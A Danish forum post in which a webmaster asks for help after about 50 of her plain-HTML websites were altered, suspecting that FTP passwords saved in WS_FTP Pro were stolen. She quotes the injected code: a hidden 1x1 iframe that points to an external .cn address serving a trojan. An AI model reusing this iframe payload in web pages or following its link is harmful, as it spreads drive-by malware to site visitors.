Er vist udsat for Hacking (cross site scripting)?
Hej med Jer,Jeg har i dag været udsat for, at en masse hjemmesider som jeg administrerer, har været udsat for hacking.
Jeg administrerer omkring 50 sider og på alle disse er der lagt en <iframe> ind som det sidste i <body>-tagget, som dirigerer videre til en side med en trojansk hest :(
Eksempel fra en af siderne:
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0"><iframe src="http://bestlotron.cn/in.cgi?cocacola59" width=1
> height=1 style="visibility: hidden"></iframe>
KLIK IKKE PÅ LINKET!!
Hvordan kan dette gå til?
Back-up'en af de forskellige sites på min computer fejler ikke noget.
Jeg bruger FTP programmet WS_FTP Pro V. 8.0, og har noteret at det stort set er alle de forskellige sider, som der er forudinstillet koder for i dette program, som er blevet inficeret! Kan det være noget med FTP-programmet?
Har 3 andre sites som ikke er indkodet til automatisk log-on via WS_FTP Pro, og disse er der ikke sket noget med.
De forskellige sites ligger hos 3 forskellige udbydere, og de svarer alle, at der ikke er noget problem hos dem, men at det er kunden der skal have sin software opdateret....hvad så end det betyder?
Jeg er virkelig nervøs for at blive udsat for dette igen og har læst et andet sted, at når først hackeren har fundet ind en gang, så kan jeg forvente at det vil ske jævnligt fremover.
En anden bruger herinde har været udsat for det samme:
http://www.eksperten.dk/spm/841964
Hvad kan man gøre for at løse dette problem? Nogen gode råd?
Ydermere kan jeg nævne at alle de websider jeg administrerer kun indeholder ganske alm. HTML-kodning. Så ingen websites med store koder og databaser.
Jeg har tjecket min PC for virus/trojanere med AVG og den skulle være ren.
Håber at der sidder et klogt hoved herinde :)
De bedste hilsner
Line
